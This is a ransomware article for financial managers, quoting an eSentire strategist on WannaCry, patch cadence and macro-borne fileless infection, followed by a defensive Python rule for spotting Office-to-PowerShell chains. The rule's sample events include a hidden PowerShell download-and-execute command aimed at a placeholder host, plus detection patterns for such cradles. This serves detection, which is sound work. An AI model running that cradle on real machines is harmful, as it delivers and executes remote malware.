

Eldon Sprickerhoff, eSentire

Ransomware: Managers should expect the unexpected

Ransomware, malicious code that encrypts files and demands a ransom to decrypt, has been around for years, but why is this most recent version so successful? The answer is bitcoin. 

Bitcoin provides a method by which hackers may remain anonymous yet still have a way to monetise attacks without creating a money trail. But whereas most public ransomware attacks to date have tended to be low-scale and relatively unsophisticated, the Internet of Things means that billions of devices are now connected, presenting a surfeit of attack surfaces for cyber criminals.

Not only that, but the ambition of ransomware attacks has grown, as evidenced by the WannaCry event last month, which caused chaos, infecting some 300,000 computers globally.

"The most recent SEC-OCIE Risk Alert highlighted the fact that ransomware was a particularly important issue upon which firms must focus; something that I have long advocated. But there's still so much to look at because there are new versions of malware constantly evolving, week-by-week," comments Eldon Sprickerhoff, founder and chief security strategist for the cybersecurity services company eSentire Inc.

For any fund manager, probably the most important question to ask when conducting a due diligence appraisal of their service providers is 'What are you doing to defend yourself against ransomware?'

This might appear a simple question, but consider what it takes for a ransomware attack to succeed: approximately a dozen things have to go wrong in sequence. There are technical aspects, such as email servers (both the firm's own and those of an upstream mail service provider) failing to detect the malware; there are training issues, where an employee receives the malware email, clicks on it and inadvertently initiates the attack; there is the lack of an incident response playbook to follow; or even a backup methodology that doesn't fit the current needs of the firm.

"Given that ransomware is a highly likely attack vector, the more fulsome a response a firm can offer their clients the better. It will give managers a pretty good sense of how well placed the service provider is to defend almost all types of cybersecurity attacks. Defence methodologies used against ransomware improve a firm's defence against insider threat, other malware threats, data extrusion threats and so on. That one question, simple as it is, covers a whole array of technical and policy/procedure considerations," says Sprickerhoff. 

To help with this, eSentire has developed a ransomware defence matrix*, detailing which mechanisms to put in place to guard against a ransomware attack.

With respect to WannaCry, it only impacted organisations that had failed to apply a patch Microsoft had released a couple of months prior to the attack.

Microsoft runs a patch release program called Patch Tuesday; something they've been doing every month since October 2003. This March, things were different. There was more urgency. Microsoft sensed that an attack was imminent and needed to get the patch out quickly, not wait until the second Tuesday of the month.

"Even though Microsoft said these were critical patches, there didn't seem to be the heightened concern that it truly demanded and some firms treated it like any other critical patch that could wait for whatever their regular patch cadence required. In some cases, this could postpone the installation until the next quarter. Suddenly you have a scenario where firms could be susceptible to weaponised zero days discovered by the NSA," says Sprickerhoff.

There is some concern that a similar ransomware attack could bring down global exchanges and hobble the financial industry. Sprickerhoff refers to the Sapphire worm from 13 years ago. 

"It was a vulnerability discovered in Microsoft SQL; once infected, it rattled through data providers and financial institutions, flooding networks and shutting down banking machines. We are, however, so much further ahead and better protected than we were 13 years ago. I recommend that financial organisations of all sizes re-assess their incident response plans following WannaCry." 

Email remains the most favoured attack vector for ransomware. It has, however, moved on from people emailing executables to a stage where malware has become essentially fileless. 

Rather than directly downloading a malicious executable, an attacker may use a different vector, such as PowerShell, to download and execute code. Similarly, malicious content embedded in an otherwise benign document, such as a macro, may be more difficult to discover.

"A user may open an Office document which runs the embedded macro and inadvertently downloads the malware onto the terminal. A typical antivirus programme is not necessarily going to catch it; at a high level, this is how infection vectors have changed in the last few years and antivirus programs have not all caught up," concludes Sprickerhoff.
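The infection chain just described (Office document, embedded macro, PowerShell pulling code down and running it in memory) leaves a trace that endpoint telemetry can see even when antivirus does not: an Office process becoming the parent of a shell, with a command line full of download-and-execute traits. The following is an added example, not code from eSentire or from the article, showing a small triage rule over process-creation records. The event field names, the constructed sample events and the `example.invalid` URL are assumptions for illustration only.

```python
"""Triage of process-creation events for the macro -> PowerShell chain.

Added example. The records below are hand-constructed stand-ins for Windows
process-creation telemetry (the kind of fields a Sysmon Event ID 1 carries);
the field names are an assumption, not a real log schema.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Office applications that have no routine reason to spawn a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits of a "download and run in memory" cradle. Each pattern
# that matches adds one point; the labels become the reasons in the finding.
CRADLE_PATTERNS = [
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I), "network download"),
    (re.compile(r"invoke-expression|\biex\b", re.I), "in-memory execution"),
    (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile", re.I), "profile skipped"),
    (re.compile(r"-ep\s+bypass|executionpolicy\s+bypass", re.I), "execution policy bypass"),
]


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    host: str
    parent: str
    child: str
    score: int
    reasons: List[str]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: ProcessEvent) -> Optional[Finding]:
    """Score one event; None means nothing in it is worth an analyst's time."""
    parent, child = basename(event.parent_image), basename(event.image)
    reasons: List[str] = []
    score = 0
    if parent in OFFICE_PARENTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
        score += 3  # the parent/child pair alone justifies a look
    for pattern, label in CRADLE_PATTERNS:
        if pattern.search(event.command_line):
            reasons.append(label)
            score += 1
    return Finding(event.host, parent, child, score, reasons) if score else None


def triage(events: List[ProcessEvent]) -> List[Finding]:
    """Findings for all events, highest score first."""
    return sorted((f for f in map(analyse, events) if f), key=lambda f: -f.score)


# Constructed sample telemetry: two benign events and two that match the chain.
SAMPLE_EVENTS = [
    ProcessEvent("WS-017", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 'WINWORD.EXE /n "quarterly_report.docx"'),
    ProcessEvent("WS-017", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/payload')"),
    ProcessEvent("WS-022", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcessEvent("WS-031", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 # Constructed base64 (encodes the alphabet), not a real payload.
                 "cmd.exe /c powershell -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.host}: score {finding.score}: {'; '.join(finding.reasons)}")
```

The parent/child relationship carries most of the weight on purpose: a cradle can be obfuscated until none of the command-line patterns fire, but a spreadsheet launching a shell is unusual enough on its own to deserve review, which is why the rule reports it even with an empty command line.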

Financial institutions are probably better protected than any other industry but as WannaCry showed, they still have to expect the unexpected.
